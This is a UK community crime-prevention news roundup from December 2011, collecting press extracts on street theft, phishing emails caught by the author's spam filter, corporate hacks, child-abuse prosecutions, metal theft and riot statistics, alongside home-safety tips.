The articles on this page are either produced by the operator of the website or taken from national publishers or Government departments. Where the information is from an external source, all information on the origins of the article will appear under the title.

We are currently investigating the links on this webpage to see if they direct you to a website that will possibly download a 3rd party cookie to your computer. Your browser or security software may be set up to prevent this download from taking place.

HAPPY NEW YEAR - SOME SUGGESTED RESOLUTIONS

- Test your smoke alarm and replace old batteries
- Always ensure that uPVC doors are locked correctly
- Keep computer security software up to date.
- Regularly check bank and credit card statements for fraudulent transactions.
- Shred unwanted bank, credit card and utility statements.
- Check that the tread on your car tyres meets the legal depth.
- Why not at least think about having that free household security check by your local Police Safer Neighbourhood Team!

(29th December 2011)



"HUGGER MUGGERS" : POLICE WARN OF "FRIENDLY" CRIMINALS
(BBC News, dated 26th December 2011)
www.bbc.co.uk

 

Criminals are mugging people on nights out in central London by pretending to be their friends but then stealing their belongings, police have said.

The groups have been nicknamed "hugger muggers" by Scotland Yard as they gather around revellers who have been drinking and give them hugs.

But they are actually feeling in their pockets and taking wallets, jewellery and other valuables, officers said. More than 160 such cases were reported in the West End in the past year.

The Metropolitan Police is trying to raise awareness of the practice and offenders have been issued with anti-social behaviour orders to ban them from busy areas.

One victim, who asked the BBC not to identify him, had his credit card stolen by "friendly" strangers at a bar. "I felt a bit stupid in a sense and naive that I'd actually allowed myself to get into that situation," the man said. He also described the "real anger and hurt" he felt as a victim of crime.

Det Sgt Chris Minnighan said the issue was "intrinsically linked to the night-time economy in Westminster". Police are "working tirelessly" to keep the West End as safe as possible, he added.

(29th December 2011)


 

MORE NEWS FROM MY SPAM INBOX- DECEMBER
Category : phishing
 
My Internet Service Provider's (ISP) spam filter continues to do a good job. Apart from the BT phishing spam in early December, the following have also been caught by my spam filter :

Barclays Bank - Subject : BA128732 Notification of Limited Account Access. Content : We need your help resolving an issue with your account. To give us time to work together on this, we've temporarily limited what you can do with your account until the issue is resolved. Click on attached bogus link. A major giveaway on this one was the e-mail address "barcllays.co.uk".

Santander - Subject : New Security Dedicated Server. Content : We have created a new dedicated security server to keep all our online banking customers account safe and secure. This server has been tested in most of our bank branches. Now we are asking all our online banking customers to register for the new security server to keep them safe. Click on attached bogus link.

Santander - Subject : Santander Online Banking - We've suspended your account. Content : Your account is suspended due to multiple number of incorrect login attempts. For your protection, we've suspended your account.
To reactivate your login access please download the form attached to your e-mail and confirm your details. If not completed until December 13, 2011, we will be forced to suspend your account. Malicious attachment included.

Co-operative Bank - Subject : Important Notification : Pending Transfer. Content : There is a pending transfer into your bank account from HM Revenue & Customs (HMRC)For Security Reasons We would Like you to confirm you account status and profile on file with us before the transfer can be completed. To confirm your account status for your safety and security you are required to use the reference Alert Code: ###########. Click on attached bogus link.

Co-operative Bank - Subject : Alert:Co-operative Bank Online Notification. Content: Our online banking security noticed too many error login attempt to your online account. Your online account will be terminated if not verify with 24 hours. Please verify and prove account ownership. Click on attached bogus link.

Federal Insurance Company - Subject : FDIC: About your business account. Content : We have important information about your financial institution. Please click here to find information. This includes information on the acquiring bank (if applicable), how your accounts and loans are affected, and how vendors can file claims against the receivership. Click on attached bogus link.

DHL US - Subject : A package is available for reception. Content : Your package has been sent to your address.
Please find a post label attached which contains a track number of your package. Malicious attachment included.

These e-mails are bogus and are just phishing for personal information. If you receive anything like them, delete it immediately and do not open any attachments. If you are suspicious about activity on your bank or utility accounts, contact your bank or service provider direct using a known telephone number, NOT contact details within the bogus e-mails.

(29th December 2011)


 

CURRENT COMPUTER SECURITY NEWS - DECEMBER 2011

All links under this heading are [Note 1]

"ANONYMOUS" HACKERS HIT US SECURITY FIRM STRATFOR
(BBC News, dated 26th December 2011)

Full Article : As below

The activist hacker group Anonymous says it has stolen thousands of emails, passwords and credit card details from a US-based security think-tank.

The hackers claim they were able to obtain the information because the company, Stratfor, did not encrypt it.

They say Stratfor's clients include the US defence department, law enforcement agencies and media organisations.

The Austin-based company says it has now suspended the operation on its servers and email.

An alleged member of Anonymous posted an online message, claiming that the group had used Stratfor clients' credit card details to make "over a million dollars" in donations to different charities.

Stratfor later announced that it would keep its email and servers suspended for some time.

It also said the disclosure was "merely a list of some of the members that have purchased our publications and does not comprise a list of individuals or entities that have a relationship with Stratfor".

Anonymous has previously claimed responsibility for cyber attacks on financial institutions seen as enemies of the whistleblowing website Wikileaks.


 

PLANS TO MIGRATE LAPD TO GOOGLE CLOUD DROPPED
(Computer World, dated 22nd December 2011 author Jaikumar Vijayan)

Full Article : http://cwonline.computerworld.com/t/7777085/930454165/545433/0/

After more than two years of trying, the City of Los Angeles has abandoned plans to migrate its police department to Google's hosted email and office application platform saying the service cannot meet certain FBI security requirements.

As a result, close to 13,000 law-enforcement employees will remain indefinitely on the LAPD's existing Novell GroupWise applications, while other city departments will use the Google Apps for Government cloud platform.

Council members last week amended a November 2009 contract the city has with systems integrator Computer Science Corp. (CSC) under which CSC was supposed to have replaced LA's GroupWise e-mail system with Google's email and collaboration system. Under the amended contract, the LAPD will no longer move its email applications to Google.

Instead, Google will pay up to $350,000 per year for the LAPD to maintain its GroupWise licenses for the entire term of the CSC contract and any extensions beyond that. Google will also substantially reduce the amount it charges for the rest of the city's use of Google Apps. Under the amendment, CSC too will reduce its initial integration fee for the project by $250,000.


 

CHINESE HACKERS BREACHED US CHAMBER OF COMMERCE
(Computer World, dated 21st December 2011 author Jaikumar Vijayan)

Full Article : http://cwonline.computerworld.com/t/7774070/930454165/545204/0/


Chinese hackers once broke into computers at the U.S. Chamber of Commerce and had access to everything on the organization's systems, including information on about 3 million of its members.

A Chamber of Commerce spokesman this afternoon confirmed reports that the intrusion was discovered and shut down in May 2010, about a year after the hackers gained access to the business organization's networks.

According to a report in today's Wall Street Journal, investigators have been unable to determine specifically what information may have been compromised. However, it appears that the hackers targeted four Chamber employees who worked on Asia policy, the Journal said. About six weeks' worth of email belonging to those four employees is believed to have been stolen. In total, emails belonging to about 50 members of the Chamber appear to have been stolen, the Journal reported.

The highly targeted attack appears to have been carried out by an organized group of hackers thought to be affiliated with the Chinese government. The attackers appeared to know who to target and what data to go after, according to the Chamber's chief operating officer, David Chavern. The Journal story quotes Chavern as describing the attackers and their attack methods as being very sophisticated.


 

iBAHN, SUPPLIER OF HOTELS INTERNET SERVICES, DENIES BREACH
(Computer World, dated 15th December 2011 author Jeremy Kirk)

Full Article :  http://cwonline.computerworld.com/t/7758835/930454165/544323/0/

iBahn, a provider of internet services to some 3,000 hotels worldwide, denied on Thursday a news report that its network was breached by hackers.

Bloomberg wrote that a highly skilled group of hackers based in China, which U.S. investigators have called "Byzantine Foothold," attacked iBahn, citing unnamed sources, including one U.S. intelligence official.

The alleged breach "may have let hackers see millions of confidential e-mails, even encrypted ones" from executives staying in hotels using iBahn's network, Bloomberg wrote.

The assertion came in an extensive story describing intensifying efforts by China-based hackers to infiltrate computer systems of U.S. corporations to steal intellectual property.

In a written statement, iBahn said it was aware of the allegations in the news report but it had "not found proof of any breach on the iBahn network."

"iBahn takes the security and protection of its customers' information very seriously, provides its customers with the highest possible level of security, and relentlessly monitors attempted hacks," the company said. "As such, we are now gathering all relevant information regarding this matter and will provide updates as soon as we learn more."


 

FOUR CHARGED WITH HACKING POINT OF SALE COMPUTERS
(Computer World, dated 8th December 2011 author Grant Gross)

Full Article :  http://cwonline.computerworld.com/t/7745511/930454165/543606/0/

Four residents of Romania have been charged for their alleged participation in a multimillion-dollar scheme to remotely access point-of-sale systems at more than 150 Subway restaurants and other U.S. merchants and steal payment card data, the U.S. Department of Justice said.

A POS system allows merchants to process customer purchases and typically includes a computer, monitor, credit-card processing system, signature capture device and a customer pin pad device. Merchant victims include more than 150 Subway restaurant franchises in the U.S. and 50 other retailers. The four compromised the payment card data of more than 80,000 customers and made millions of dollars worth of unauthorized purchases, the DOJ said.

The four-count indictment, unsealed Wednesday, charges the four Romanians with conspiracy to commit computer fraud, wire fraud and access device fraud. Charged in U.S. District Court for the District of New Hampshire were Adrian-Tiberiu Oprea, 27, of Constanta, Romania; Iulian Dolan, 27, of Craiova; Cezar Iulian Butu, 26, of Ploiesti; and Florin Radu, 23, of Rimnicu Vilcea.

Oprea was arrested last week in Romania and is in custody there, the DOJ said in a press release. Dolan and Butu were arrested upon their entry into the U.S. in August 2011 and remain in custody. Radu remains at large.

From 2008 until May 2011, Oprea, Dolan, Butu and Radu conspired to remotely hack into more than 200 U.S.-based merchants' point-of-sale (POS) or "checkout" computer systems in order to steal customers' credit, debit and gift card numbers and related data, the DOJ alleged. Compromised Subway restaurant systems were in New Hampshire, New York, California and elsewhere, according to the indictment.




SYMANTEC SAYS SPAM LEVELS FALL TO LOWEST IN THREE YEARS
(Computer World, dated 6th November 2011 author Jeremy Kirk)

 

Full Article : http://cwonline.computerworld.com/t/7740770/930454165/543156/0/


Global spam fell to the lowest level in three years in a sign that spammers may be getting a better rate of return by hitting social-media websites instead, according to the latest figures on Tuesday from Symantec.

About 70.5 percent of all email was spam, a still-high figure but one that is much lower than a few years ago, when it was well over 90 percent. Symantec calculated the percentage by analyzing some 8 billion messages it processed a day last month, according to the company's latest MessageLabs Intelligence Report.

Spam volumes dipped in March after Microsoft, law enforcement and other companies joined forces to take down Rustock, a large botnet responsible for sending up to 30 billion spam messages per day.

"Ever since then, nothing really filled the void," said Andy Watson, a senior software engineer at Symantec.

Botnets increasingly have come under law enforcement scrutiny. Other botnets including Coreflood and Kelihos were taken down this year, and two major ones, Waledac and Bredolab, were dismantled in 2010. A large affiliate spamming network called Spamit also shut down last year.

Watson said spammers may be putting more effort into social media sites because there is a better return. Spam links on services such as Twitter and Facebook can spread through users clicking on the links, Watson said.




EUROPEAN DISTRUST OF US DATA SECURITY CREATES MARKET FOR LOCAL CLOUD SERVICE
(Computer World, dated 2nd December 2011 author Jennifer Baker)

 

Full Article : http://cwonline.computerworld.com/t/7736671/930454165/542801/0/

Concern in the European Union that U.S. data protection laws are too lax has created a new market for European cloud computing services.

A recent survey indicated that 70 percent of Europeans have concerns about their online data and how well companies secure it and now two Swedish companies, Severalnines and City Network, have begun promoting their newly merged service as "a safe haven from the reaches of the U.S. Patriot Act." Under the U.S. Patriot Act, data from European users of U.S.-based cloud services can secretly be seized by U.S. law enforcement agencies.


 

GCHQ TO TAKE HUB ROLE IN UK CYBERSECURITY
(ZD NET UK, dated 25th November 2011 author Jack Clark)

Full Article : http://nl.zdnet.co.uk/7G5e9BDaic/isFyc

The UK's intelligence agency GCHQ will become a main port of call for businesses dealing with cyberattacks, under the government's new cybersecurity strategy revealed on Friday.


The Cheltenham-based agency will get an infusion of hundreds of millions of pounds to fund its larger role in the UK's cyber-defence, Cabinet Office minister Francis Maude said in announcing The UK Cyber Security Strategy (PDF). It will have a key role in a new cybersecurity 'hub' that will be set up as a brokerage for the public and private sectors to exchange information about threats and technologies.

With the new strategy, the government is aiming to make the UK one of the safest places in the world to do business, as well as tackling cybercrime and cyber-espionage in general, according to Maude. The document, the release of which has been delayed twice, replaces a two-year-old strategy and allocates £650m in funding to set up a National Cyber Security Programme.


"The growth of the internet has transformed our everyday lives," Maude said in a statement (PDF). "But with greater openness, interconnection and dependency comes greater vulnerability. The threat to our national security from cyberattacks is real and growing."



BILL WOULD ALLOW US INTELLIGENCE TO SHARE CYBER-THREAT INFO
(Computer World, dated 30th November 2011 author Grant Gross)

 

Full Article : http://cwonline.computerworld.com/t/7731141/930454165/542336/0/

A bill introduced by senior members of the House Intelligence Committee would allow intelligence agencies to share classified cyber-threat information with approved U.S. companies, while encouraging companies to share their own information.

The Cyber Intelligence Sharing and Protection Act, introduced Wednesday, is a "significant first step" toward protecting the U.S. government and businesses from constant cyberattackers, said U.S. Rep. Mike Rogers (R-Mich.), the committee chairman. Mike Rogers said: "There is a cyberwar that is going on today".

The bill would direct the U.S. director of national intelligence to set up a process for intelligence agencies to share cyber-threat information and for granting security clearances at organizations that want to receive the information. Businesses that receive the classified information would generally be limited in their use of the information to protecting themselves or their customers.

The bill would also give lawsuit protection to companies that use the information to protect their networks or share cyber-threat information. The bill would allow companies to share cyber-threat information anonymously through an undefined process or restrict those with whom they share information, including the government.

UPDATE : COMMITTEE APPROVES CYBERSHARING BILL DESPITE PRIVACY CONCERNS
(Computer World, dated 2nd December 2011 author Grant Gross)

Full Article : http://cwonline.computerworld.com/t/7736671/930454165/542799/0/

The U.S. House of Representatives Intelligence Committee has approved a recently introduced bill that would allow greater cyberthreat information sharing between U.S. intelligence agencies and private companies even though privacy advocates say it would allow those agencies to spy on U.S. residents.


(29th December 2011)


 

AUSTERITY CRIMEWAVE HITS BRITAIN
(Sunday Times, dated 11 December 2011 authors David Leppard, Cat Flyn. Additional reporting Philip Cardy, Simon Trump and Adrian Craddock)
www.thesundaytimes.co.uk [Note 1]

Note: The following are extracts from the above mentioned article.

Burglaries and robberies are on the rise as consumers looking for bargains fuel the market for stolen goods.

Britain is falling victim to an "austerity crimewave" with a sharp rise in the number of burglaries and robberies, new figures indicate.

Statistics collated for the Economic Policy Centre (EPC), an independent think tank, reveal there were 9% more burglaries across England and Wales in October than during the previous December. Thirty-three of the 43 police forces in England and Wales saw an increase when figures for the two months were compared.

While only a snapshot of crime trends over the past year, the EPC survey, compiled using monthly crime figures given to police.uk website, provides further evidence of a marked increase in so-called acquisitive crime as the economic downturn worsens.

A separate set of figures compiled by the Metropolitan Police across the 12 months to October shows a similar trend, with muggings across London up 14.8% compared with the same period last year. Burglaries in the capital rose by 8.8%.

However, some parts of the capital have experienced even more extreme spikes, with Bexley, Southeast London, up by 68.1% and burglaries up by 43.7% in Tower Hamlets, East London.

While some forces disputed the study's research methods, many citing the weather as a factor, the rise in the number of burglaries is broadly similar to that found by the Metropolitan Police.

Areas of London that saw substantial increases in muggings and burglaries in the 12 months to October 2011 include Redbridge (Northeast London) where muggings rose by 33%. Havering saw a rise of 31.9% and Lewisham (Southeast London), 30.4%. In Kensington and Chelsea (West London) burglaries rose by 19.4%.

In Cleveland, the EPC research found an increase of 55.5% in the number of burglaries and of 22.7% in robberies.

In Devon and Cornwall where Home Office figures released earlier this year pointed to a fall in property crimes, the EPC survey suggested a 66.2% rise in the number of burglaries.

The EPC figures also indicate big increases in burglary in North Wales (41.1%), Warwickshire (25.4%), Derbyshire (41.4%) and South Wales (38.7%).

The increase in robberies is less dramatic although, according to the EPC's data, Devon and Cornwall saw a 95.8% increase from 24 incidents last December to 47 in October. Some parts of London, using the Met's own methodology, saw a 43% rise in the number of muggings over the year to October 2011.

Home Office statistical models have previously identified a correlation between deteriorating economic conditions and acquisitive crimes such as burglary and robbery.

(29th December 2011)


 

HACKERS TAKE DOWN CHILD PORNOGRAPHY SITES
(BBC News, dated 24th October 2011)
www.bbc.co.uk

Hacktivist group Anonymous has briefly taken offline 40 sites it claims traded in images of child sexual abuse. As part of the action it published the names of 1,500 people who it says used a site known as "Lolita City".

The attacks were carried out as part of Operation Darknet which targeted abuse groups that swapped images via the Tor network. Experts condemned the attacks saying they could have scuppered ongoing investigations or tainted evidence.

Vigilante action
 
The Tor network tries to aid anonymity by routing web browsing queries through a series of servers scattered around the net. This makes it harder to trace users and monitor what they are seeing.

Many protestors, in nations such as Egypt and Syria, use Tor to hide their location from authorities.

One innovation, recently added to Tor, is the ability to create a "darknet" - a network that works in a similar way to the web but can be seen only by Tor users.

In early October, Anonymous hackers noticed that one site hosted on this Tor darknet contained links to images of child sex abuse.

Anonymous members removed the links but they were soon re-posted. It knocked the site offline with a denial of service attack and worked out which firm was hosting the links.

In a document detailing its actions, Anonymous said it ordered the firm to remove the illegal content. It claimed the demand was refused, so it broke into the firm's network and shut down a series of computers hosting the abuse images.

It vowed to continue the attacks until the images and other content was removed.

The firm accused of hosting the content has yet to respond to a request for comment on the attacks.

Christian Sjoberg, boss of image analysis firm NetClean which helps police forces categorise images of abuse, said while removing images was laudable, hackers should think carefully about what they have done.

"It could be dangerous," he said, "because if it's a big host the police will definitely know about it."

"If you think of these images as evidence of a crime that's published on the internet then the picture gets a bit more complicated," he said.

Graham Cluley, senior technology consultant at security firm Sophos, said the attacks were misguided.

"Take-downs of illegal websites and sharing networks should be done by the authorities, not net vigilantes," he said.

The attacks could have put an existing investigation at risk, stopped the police from gathering evidence they need to prosecute, or made it difficult to argue that evidence has not been corrupted, said Mr Cluley.

"The Anonymous hackers may feel they have done the right thing, but they may actually have inadvertently put more children at risk through their actions," he said.

(29th December 2011)


 

JOINT ACTION IN 22 EUROPEAN COUNTRIES AGAINST ONLINE CHILD SEXUAL ABUSE MATERIAL
(Europol, dated 16th December 2011)
www.europol.europa.eu

Law enforcement agencies from 26 European countries, supported and coordinated by Europol, have carried out a major crackdown against online child sex abuse file-sharing networks. So far 'Operation Icarus' has helped to identify 269 suspects and arrest 112 suspects, spread across 22 involved countries.* The operation targeted those sharing the most extreme forms of video material, which included babies and toddlers being sexually abused and raped. A lot of the material seized during the house searches is awaiting forensic examination in order to support follow-up investigations and possible prosecution of offenders. However, this operation has already uncovered previously unknown networks of child sex offenders operating on different internet channels.

"This is the latest major success in over 10 years of Europol supporting law enforcement agencies in Europe in their fight against child sex abuse online. This operation shows how the internet is helping offenders to develop better techniques for sharing images on a global basis and for protecting their identity. The problems involved are becoming harder to police and call for sustained efforts by policy-makers and law enforcement agencies to ensure that society's response remains strong and agile in this area. Europol is committed to playing a leading part in this work through its unique capabilities to develop intelligence and digital forensic skills across Europe and through the coordination of major international operations," says Rob Wainwright, Director of Europol.

Investigations are ongoing and more arrests are expected. Special focus will be on identifying the producers of the material, the suspects and their victims. Among those arrested for downloading illegal material was one who is suspected of grooming a young child, and was arrested before being able to meet the child face to face.

Operation Icarus is the first operation concluded under the auspices of the new action plan of the COSPOL Internet Related Child Abuse Material Project (CIRCAMP)**, an initiative by EU police chiefs led by Belgium and funded by the European Commission.

Cecilia Malmström, EU Commissioner for Home Affairs welcomed the joint action saying "These children are victims of multiple crimes. First, when the actual abuse takes place. Then, when it is filmed. And, thereafter, every time the images are posted, circulated or viewed. The joint action carried out under Europol coordination shows our commitment to backing the fight against this appalling crime. It highlights the importance of cooperation between law enforcement authorities at European and international level to tackle criminal activities that know no borders. We will continue to use all the tools at our disposal, including the recently adopted EU directive on the fight against pedo-pornography, sexual abuse and exploitation of minors, to support efforts to combat these horrendous crimes and to help protect our children".

Operation Icarus was initiated during a CIRCAMP meeting at the start of 2011. It was agreed that the National High Tech Crime Unit of the Danish Police (DK NITEC) should be the lead country and carry out the investigations because of its expertise in illegal material exchange through file sharing systems, known as peer-to-peer. After the collection of intelligence by the Danish National Police, an operational meeting was organised at Europol in September 2011, to disseminate intelligence packages to the involved EU Member States and countries with a Europol operational agreement.

Intelligence and additional information was disseminated by Europol through its secure information system in order to guarantee the integrity of data and to ensure a fast reaction in the concerned countries. Europol's cooperation network will also facilitate further investigations by involving partners such as Eurojust and Interpol when needed.

"Law enforcement agencies have to work together to combat the growing threat of cybercrimes against children, and we have to use the most advanced technology available. The complexity is huge and challenging - for example one of the Danish suspects had 29 terabytes of data that we seized. This is an incredible amount of data for our investigators to handle. To put it into perspective, that could hold about 9000 hours of high-quality video," says Jens Henrik Hoejbjerg, Danish National Commissioner of Police.

* The participating countries are: Austria, Belgium, Bulgaria, Cyprus, Czech Republic, Denmark, Estonia, Finland, France, Germany, Ireland, Italy, Luxembourg, Malta, Netherlands, Poland, Slovakia, Spain, Sweden, Croatia, Norway, Switzerland

** The members of CIRCAMP are: Belgium, Denmark, Finland, France, Germany, Ireland, Italy, Malta, Netherlands, Norway, Spain, Sweden, Europol and Interpol.

Further information

Virtual Global Task Force : www.virtualglobaltaskforce.com
For UK : www.ceop.police.uk

(29th December 2011)


 

HAVE A MERRY CHRISTMAS

To all readers of this website. Have a MERRY CHRISTMAS and a SAFE and PROSPEROUS NEW YEAR.

If you are going away for Christmas consider the following :

- In case our crazy weather changes again to freezing. Ensure that your home keeps to an adequate temperature to prevent burst pipes.

- Ensure that all of your windows and doors are locked. Pay special attention to those double glazed ones.

- Have at least one light on a timer so that it comes on in the evening for a few hours to give the impression that someone is at home.


 

FIVE PEOPLE JAILED FOR ROLE IN INTERNATIONAL PAEDOPHILE RING
(The Guardian, dated 20th December 2011 source Press Association)
www.guardian.co.uk [Note 1]

A woman and four men have been jailed for their part in an international paedophile ring that committed "horrific" crimes against two young children in the UK and one in Australia.

The ringleader, Robert Hathaway, 37, from Portsmouth in Hampshire was given an indeterminate sentence of 12 years at Portsmouth crown court while his partner Melissa Noon, 30, received four years.

Judge Roger Hetherington told Hathaway he would not be released from prison for a minimum of six years and not until the parole board deemed him no longer to be a danger to children.

The three other defendants became involved by meeting the couple over the internet to carry out the abuse.

Stephen Fraser, 42, from Cambridge was sentenced to four years with an extended licence period of six years; Simon Hilton, 29, from north London was imprisoned for four years with an extended licence period of six years; and Lee Parson, 38, from Portsmouth was jailed for three years.

A six-week trial heard that the two young children in the UK were repeatedly abused by the group, who used a nudist website as a guise for their perversions.

Hampshire police launched their investigation into the ring after being tipped off by the authorities in Australia, who had uncovered a "mirror image" ring in Brisbane and Sydney, which also abused at least one young child.

Hathaway had been in contact with this ring and shared images with them and one of the charges faced by Noon was for encouraging the Australian child to engage in sexual activity.

A total of 2,000 pages of chat logs were uncovered by police, as well as 14,000 indecent images of children and 300 videos of children being abused.

The abuse included offences of rape and sexual assault as well as forcing the children to engage in naked games of Twister and wrestling.

As Kerry Maylin, prosecuting, described the offences committed by the defendants, sighs of disgust could be heard from the packed public gallery.

She said the victims were "systematically and repeatedly" raped by Hathaway and sexually assaulted on a daily basis.

The abuse was documented with thousands of photographs and videos, some as long as 42 minutes, which were distributed by Hathaway over the internet.

These included the abuse being carried out while the victims watched children's TV programmes and during bedtime stories, when they were seen to be reading books such as In the Night Garden.

Some of the abuse was streamed live over the internet using webcams to broadcast to paedophiles around the world who would reassure the victims that the behaviour was "normal".

Maylin said that among the videos of abuse found on Hathaway's computer was a cartoon in the style of The Simpsons aimed at training children in the ways of sexual abuse.

Describing Noon's role in the crimes, she said that as well as taking photographs of the offences for distribution on the nudist website that she ran, she also became involved, for example by taking part in the naked game of Twister with one of the victims.

Also, in a webcam conversation, Noon told the Australian victim to strip naked before telling the girl that she was her "little sweet princess" and she had an "adorable body".

When the girl asks to leave the conversation, Noon tells her: "Don't you go, I'm just getting hot."

Maylin said Noon was clearly "sexually excited".

In another internet conversation about child abuse with a female paedophile in Australia, Noon tells her that one of the UK victims "does not understand what this type of love is, she's too young, I will keep teaching her".

Speaking after the case, Maylin said: "This was a horrific case of systematic child abuse where the defendants subjected children as young as four to atrocious acts of sexual abuse and encouraged others across the world to commit similar offences."

Paul Walker, defending Noon, said she had learning difficulties and had an IQ of between 61 and 69, putting her in the bottom 1% for her age.

He said: "What that means is she is more vulnerable to manipulation and coercion."

He added that if it had not been for the influence of Hathaway's "manipulations", Noon would not have become involved in child abuse.

Stephen Smyth, defending Hathaway, said his client suffered depression and had been vulnerable to "outside influences" since the death of his mother when he was eight, and his father when he was 10.

"In his grey and miserable life, there was really nothing other than sex," Smyth said.

Jennifer Knight, defending Parson, a father of two, said he had an unhappy upbringing with his father who was an alcoholic, and his wife who was abusive and violent towards him.

Andrew Turton, defending Hilton, said he was suffering depression and had been lonely following a recent relationship breakdown.

He added that the IT consultant had become isolated in his work and social life which revolved around the internet, meaning "he was living a virtual life in a virtual world".

David Reid, defending Fraser, said his client accepted he had a sexual interest in children and was aware of the damage he had caused the children.

He added that he had stopped offending on his own accord as his serious offending had made him realise that what he was doing was wrong.

Reid said: "The most serious offences were, for him, a trigger. He describes it as making him sit up and realise the seriousness and he had no further contact."

Jon Brown, head of strategy and development for sexual abuse at the children's charity NSPCC, said that the case highlighted the depths to which some individuals will sink to produce such "appalling" images.

"The internet has made it much easier for people to access this kind of material so stopping this terrible trade is a huge task," he said.

"Every day babies and children are being assaulted and raped to feed the apparently insatiable demand for indecent photos and videos. And each time they are viewed, more degradation is heaped on the young victims."

About one in three of people convicted of possessing child abuse images has also committed other serious sex offences against children, said Brown, and it was "vital these people are identified and brought to the attention of the authorities".

He added: "Just as importantly, the young victims must get therapeutic treatment to help them overcome their terrible ordeals."

A further four defendants are to be sentenced for their part in the abuse next month.

Further information

If you have any suspicion about this type of crime taking place in your area, call someone, even anonymously.

NSPCC ( Worried about a Child, report a concern ) : 0808 800 5000

Crimestoppers ( call anonymously ) : 0800 555 111

If you accidentally access child abuse images on the internet, let the Child Exploitation & Online Protection Centre (CEOP) know : www.ceop.police.uk

Protect your children against these types of people : www.thinkuknow.co.uk

Insafe - a European network of Awareness Centres promoting safe, responsible use of the Internet and mobile devices to young people : www.saferinternet.org

(22nd December 2011)


 

METAL THEFT BY NUMBERS

Numerical information from a Sunday Times article dated 4th December 2011, entitled "Exposed: dealers cashing in on war memorials".

- The Association of Chief Police Officers estimates the total annual cost to the British economy of metal theft is £1bn.

- 300 war memorials are targeted by metal thieves each month, according to the War Memorials Trust.

- 7,000 thefts from the energy network in the past year have resulted in 290 hours of power cuts.

- 1,602 thefts of cabling between April and October led to 1,969 cancelled trains and 167 days' worth of delays.

- 1,020 thefts, mostly of copper cabling, were reported from British Telecom's network this summer.

- 10 churches a day are targeted by thieves. Church insurers have paid out £25m for 9,500 claims in the past five years.

Food for thought

When the article mentions a cost to the UK of £1bn, this is not only something that large multi-nationals claim from their insurance companies. These losses are also recouped from their customers...YOU !

During a telephone conversation broadcast on LBC (21st December 2011) a Police Inspector from the British Transport Police stated that the increase in metal thefts has been caused by the increase in its market price (ie. 1 ton of copper = £4,600 approx). He went on to say "the increase in price is as a result of demand from the "new" industrial nations".
So you could almost say that the increase in theft of metal is also having some form of effect on UK manufacturing job losses!

Society (US) remembers its former residents who gave their lives for our freedoms now. Memorials are our history.

When our lights go out, when a hospital cannot operate through lack of power. Who does it affect ? US.

When train journeys are constantly being delayed by signalling faults caused by cable theft, does your employer say that's okay; or do they dock your pay ?

When a serious accident occurs on a motorway and the only means of contacting the emergency services is a landline. Who does it affect when the telephone cables have been stolen ? US.

Churches are not only places of prayer, many of them are hundreds of years old. They are the custodians of this country's history. Sadly, not only are they being hit by physical damage to their structure; they are also having their Church plate stolen (altar crosses, communion cups etc.). As a result churches are being locked outside service times. Who does that affect ? Parishioners, Worshippers ....US.

(22nd December 2011)


 

 

UNDERCOVER STING FORCES ANTI-CORRUPTION CODE ON MEPS
(The Sunday Times, dated 4th December 2011 authors Jonathan Calvert and Heidi Blake)
www.thesundaytimes.co.uk [Note 1]

Strict anti-corruption rules are being introduced to the European parliament after a Sunday Times investigation that caught MEPs agreeing to accept secret payments to alter laws. The parliament voted last week to compel MEPs to disclose all outside earnings in excess of €5,000 (£4,296) a year and banned the receipt of gifts valued at more than €150.

It was part of a package of measures in the parliament's first code of conduct, which is designed to tighten the institution's notoriously lax rules.

Three MEPs, including a former deputy prime minister, are being investigated by anti-corruption police in their home countries as a result of this newspaper's exposé.

They were forced to step down from the parliament after putting forward amendments to legislation on behalf of lobbyists who had offered them money.

The lobbyists were in fact undercover reporters investigating persistent rumours of MEPs being prepared to sell their services.

Under the new rules, which take effect in January, all MEPs will be forced to declare online all appointments and directorships, and any other paid work amounting to more than €5,000 a year. This will include all earnings for the three years before an MEP is elected. Declarations to the register must be disclosed within 30 days.

MEPs who breach the code face temporary suspension and, in extreme cases, removal from elected office. The code also allows special access to be removed from former MEPs who take jobs as lobbyists.

David Martin, the MEP who campaigned on the issue for the Socialists and Democrats, said: "The European parliament has now adopted tougher rules than Westminster. It has made explicit rules where they were implicit before."

(22nd December 2011)


 

THE RIOT DATA SO FAR
(BBC News, dated 15th December 2011 author Dominic Casciani)

Full Article : www.bbc.co.uk/news/uk-14931987
Their source of information : Ministry of Justice

So what do we know with certainty about the rioters and looters? Are they a criminal, feral underclass or victims of socio-economic blight getting their own back on the rest of society?

Sadly, official statisticians and academics haven't thought of a way to measure such things accurately - as my colleague Mark Easton recently pointed out - but the people with the slide rules in the Ministry of Justice have given us the first real picture of the people now filling up the courts and prisons.

Their new figures cover those who have appeared before the courts. It may be stating the obvious but if someone hasn't had their collar felt, it is difficult to know a lot about them. What's more - the vast majority of those charged - 1,400 defendants - are still in the system. It will be months before we have the full facts on sentencing.

RIOTERS AGE PROFILE

Total Offenders = 1,715

Age Range

10 - 17 : 364 offenders
18 - 20 : 525 offenders
21 - 24 : 365 offenders
25 - 30 : 235 offenders
31 - 34 : 83 offenders
35 - 39 : 48 offenders
40 + : 95 offenders

CRIME COMMITTED DURING ENGLAND RIOTS

Burglary : 44%
Violent Disorder : 27%
Theft : 13%
Other disorder offences : 11%
Criminal damage : 2%
Robbery : 2%

PREVIOUS CONVICTIONS COMPARED

The statisticians say that 45% of juveniles who have appeared have had no recorded criminal history. We've also found out that 73% of all of those brought before the courts have criminal histories. Each defendant with a criminal record has committed an average of 15 offences. Roughly a quarter of them have committed 10 or more offences and about 15% had between six and 10 crimes on their record.

No previous convictions : 27.4%
One previous conviction : 10.2%
Two previous convictions : 7.4%
3-5 previous convictions : 14.7%
6-10 previous convictions : 14%
11-14 previous convictions : 6%
15-49 previous convictions : 15.4%
50+ previous convictions : 4.8%

PREVIOUS OFFENCES COMMITTED BY RIOT SUSPECTS

Theft and handling of stolen goods : 23.5%
Drug offences : 9.6%
Violence against the person : 6%
Burglary : 4.7%
Robbery : 3.6%
Other indictable offences : 13.9%
Summary and breach offences : 38.7%

Jailed London rioters named by Met Police

Details of 66 people jailed in connection with the summer riots in London have been published.

The Metropolitan Police has issued the names of those convicted of offences such as violent disorder, burglary and handling stolen goods.

Images of them have been published on the force's Flickr page : www.flickr.com/photos/metropolitanpolice [Note 1]

Four months on from the disorder in August, the force has made 3,423 arrests and 2,179 people have been charged or summonsed.

(22nd December 2011)


LONDON FIRE BRIGADE WARNS TO CHECK PIPES OVER CHRISTMAS
(BBC News, dated 20th November 2011)
